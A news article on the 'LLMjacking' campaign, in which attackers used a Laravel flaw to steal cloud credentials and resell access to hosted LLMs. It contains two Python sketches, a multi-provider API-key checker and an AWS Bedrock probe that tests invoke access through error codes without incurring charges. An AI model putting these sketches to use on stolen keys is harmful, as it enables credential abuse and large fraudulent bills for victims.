LLM services are being hit by hackers looking to sell on private info – TechRadar

Using cloud-hosted large language models (LLMs) can be quite expensive, which is why hackers have apparently started stealing, and selling, login credentials for the tools.

Cybersecurity researchers at the Sysdig Threat Research Team recently spotted one such campaign, dubbing it LLMjacking.

In its report, Sysdig said it observed a threat actor abusing a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. This flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials for LLM services.

"Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers," the researchers explained in the report. "In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted."

The researchers were able to discover the tools the attackers used to generate the requests that invoked the models. Among them was a Python script that checked credentials for ten AI services to determine which were usable. The services included AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.
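The attackers' actual script has not been published, but the technique it implements is straightforward: hit each provider's cheapest authenticated endpoint and classify the key by the HTTP status that comes back. The sketch below is an illustrative assumption of how such a checker works, not the attacker's code; the probe endpoints and header formats listed are the kind of lightweight "list models" calls such a tool would target.

```python
# Hypothetical sketch of a multi-service API-key checker of the kind Sysdig
# describes: probe a cheap authenticated endpoint per provider and classify
# the key by HTTP status, without ever running a real completion.
import urllib.error
import urllib.request

# Illustrative per-provider probes: (URL, header name, header value template).
PROBES = {
    "openai": ("https://api.openai.com/v1/models", "Authorization", "Bearer {key}"),
    "anthropic": ("https://api.anthropic.com/v1/models", "x-api-key", "{key}"),
    "mistral": ("https://api.mistral.ai/v1/models", "Authorization", "Bearer {key}"),
}

def classify_status(status: int) -> str:
    """Map the HTTP status of a probe call to a credential verdict."""
    if status == 200:
        return "valid"
    if status in (401, 403):
        return "invalid"
    if status == 429:
        return "valid-but-rate-limited"  # the key works; quota is exhausted
    return "unknown"

def check_key(service: str, key: str, timeout: float = 5.0) -> str:
    """Probe one service with one key and return a verdict string."""
    url, header, template = PROBES[service]
    request = urllib.request.Request(url, headers={header: template.format(key=key)})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return classify_status(response.status)
    except urllib.error.HTTPError as err:
        return classify_status(err.code)
    except urllib.error.URLError:
        return "unreachable"
```

Note that every probe is a read-only request: nothing here generates text, so the check itself costs the key's owner nothing and leaves little trace in usage dashboards.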

They also discovered that the attackers didn't run any legitimate LLM queries during the verification stage; instead, they did just enough to find out what the credentials were capable of, and what quotas applied.
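One way to do "just enough" on AWS Bedrock is to send a deliberately malformed invocation and read the error: an access-denied error means the key cannot invoke the model, while a validation error means the request was authorized and only the bogus body was rejected, which proves invoke access without generating (or paying for) a single token. The error-code names below follow AWS conventions; the rest of this sketch, including the probe function itself, is an illustrative assumption rather than the attackers' tooling.

```python
# Hedged sketch of a zero-cost capability check against AWS Bedrock:
# a malformed InvokeModel call reveals whether a credential can invoke
# models without ever producing billable output.

def interpret_probe_error(error_code: str) -> str:
    """Classify the outcome of a deliberately malformed invocation probe."""
    verdicts = {
        "ValidationException": "invoke-permitted",      # auth passed; body rejected
        "AccessDeniedException": "no-invoke-permission",
        "UnrecognizedClientException": "bad-credentials",
        "ThrottlingException": "permitted-but-throttled",
    }
    return verdicts.get(error_code, "unknown")

def probe_bedrock(session, model_id: str = "anthropic.claude-v2") -> str:
    """Fire the malformed probe using a boto3 session (untested sketch)."""
    client = session.client("bedrock-runtime")
    try:
        # An empty body is invalid for every model, so this can never bill tokens.
        client.invoke_model(modelId=model_id, body=b"")
        return "invoke-permitted"
    except client.exceptions.ClientError as err:
        return interpret_probe_error(err.response["Error"]["Code"])
```

The design point is that the verdict comes entirely from the error path: a checker like this distinguishes "no access", "access but throttled", and "full invoke access" while the compromised account's usage metering records nothing.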

In its report on the findings, The Hacker News says they are evidence that hackers are finding new ways to weaponize LLMs beyond the usual prompt injections and model poisoning: by monetizing access to the models while the bill gets mailed to the victim.


The bill, the researchers stressed, could be a hefty one, running up to $46,000 a day in LLM usage fees.

"The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it," the researchers added. "By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations."
